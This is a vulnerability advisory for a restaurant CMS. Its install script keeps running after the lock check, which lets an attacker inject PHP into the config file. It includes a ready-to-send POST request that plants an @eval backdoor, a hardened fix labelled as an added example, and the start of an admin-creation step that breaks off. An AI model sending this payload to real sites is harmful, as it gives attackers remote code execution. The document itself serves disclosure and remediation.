Treat Technology restaurant CMS vulnerability (getshell) - vulnerability warning - Black Bar Safety Net

2012-12-01T00:00:00
ID MYHACK58:62201235866
Type myhack58
Reporter Anonymous
Modified 2012-12-01T00:00:00

Description

The problem is in the /install/index.php file. After installation, the program generates an install.lock file in the program root directory, and /install/index.php makes a mistake when checking whether install.lock exists.

    <?php
    if(file_exists("../install.lock")) {
        header("Location: ../"); // no exit after the redirect
    }

    //echo 'tst';exit;
    require_once("init.php");
    if(empty($_REQUEST['step']) || $_REQUEST['step']==1) {

As can be seen in /install/index.php, the code only sends a 302 redirect with header() and never calls exit, so everything that follows is still executed. This alone produces at least two vulnerabilities.

1. getshell (very dangerous)

    if(empty($_REQUEST['step']) || $_REQUEST['step']==1) {
        $smarty->assign("step",1);
        $smarty->display("index.html");
    }elseif($_REQUEST['step']==2) {
        $mysql_host=trim($_POST['mysql_host']);
        $mysql_user=trim($_POST['mysql_user']);
        $mysql_pwd=trim($_POST['mysql_pwd']);
        $mysql_db=trim($_POST['mysql_db']);
        $tblpre=trim($_POST['tblpre']);
        $domain==trim($_POST['domain']); // "==" is a comparison, not an assignment; this is how the original source reads
        $str="<?php \r\n";
        $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
        $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
        $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
        $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
        $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
        $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
        $str.='define("DOMAIN","'.$domain.'");'."\r\n";
        $str.='define("SKINS","default");'."\r\n";
        $str.='?>';
        file_put_contents("../config/config.inc.php",$str); // the submitted data is written to a PHP file

The code above writes the POSTed data straight into ../config/config.inc.php, so submitting the following POST request plants a one-line PHP backdoor:

    POST /canting/install/index.php?m=index&step=2 HTTP/1.1
    Host: 192.168.80.129
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: EN-us,EN;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.129/canting/install/index.php?step=1
    Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 126

    mysql_host=test");@eval($POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu&domain=www&button=%CF%C2%D2%BB%B2%BD

This method is very dangerous, though, because overwriting the config file leaves the website unable to run.
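A hardened version of the two defects described above (no exit after the redirect, and request values spliced directly into PHP source), written here as an added example and not taken from the CMS; the validation patterns and the helper names validate_install_field and build_config are assumptions for illustration:

```php
<?php
// Added example (not the CMS's own code): fixes for the install script
// defects discussed above. Paths and field names follow the advisory;
// the validation rules are assumptions for illustration.

// 1. Refuse to run once installed, and actually stop. header() only sets
//    a response header; without exit the rest of the script keeps running.
if (file_exists(__DIR__ . '/../install.lock')) {
    header('Location: ../');
    exit;
}

// 2. Never splice raw request data into PHP source. Validate each field
//    against a tight pattern and emit it with var_export(), which yields a
//    correctly quoted PHP string literal (quotes and backslashes escaped).
function validate_install_field(string $name, string $value): string {
    $rules = [
        'mysql_host' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/',
        'mysql_user' => '/^[A-Za-z0-9_]{1,32}$/',
        'mysql_db'   => '/^[A-Za-z0-9_]{1,64}$/',
        'tblpre'     => '/^[A-Za-z0-9_]{0,20}$/',
        'domain'     => '/^[A-Za-z0-9.\-]{1,253}$/',
    ];
    if (isset($rules[$name]) && !preg_match($rules[$name], $value)) {
        throw new InvalidArgumentException("invalid value for $name");
    }
    return $value; // mysql_pwd has no pattern; var_export() still protects it
}

function build_config(array $post): string {
    $fields = ['MYSQL_HOST' => 'mysql_host', 'MYSQL_USER' => 'mysql_user',
               'MYSQL_PWD'  => 'mysql_pwd',  'MYSQL_DB'   => 'mysql_db',
               'TABLE_PRE'  => 'tblpre',     'DOMAIN'     => 'domain'];
    $lines = ['<?php'];
    foreach ($fields as $const => $field) {
        $value = validate_install_field($field, trim($post[$field] ?? ''));
        // A value such as test");@eval(...);?> becomes a harmless string
        // literal here instead of closing the define() call.
        $lines[] = sprintf('define(%s, %s);',
                           var_export($const, true), var_export($value, true));
    }
    $lines[] = "define('MYSQL_CHARSET', 'GBK');";
    $lines[] = "define('SKINS', 'default');";
    return implode("\r\n", $lines) . "\r\n"; // no closing ?> tag needed
}

if (($_REQUEST['step'] ?? '') === '2') {
    file_put_contents(__DIR__ . '/../config/config.inc.php', build_config($_POST));
}
```

The lock check with exit is the fix that closes both vulnerabilities on this page; the escaping in build_config is defence in depth for the config writer itself.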

2. Directly add an administrator

    elseif($_REQUEST['step']==5) {
        if($_POST) {
            require_once("../config/config.inc.php");
            $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
            mysql_select_db(MYSQL_DB,$link);
            mysql_query("SET NAMES ".MYSQL_CHARSET);
            mysql_query("SET sql_mode=''");

            $adminname=trim($_POST['adminname']);
            $pwd1=trim($_POST['pwd1']);
            $pwd2=trim($_POST['pwd2']);
            if(empty($adminname)) {
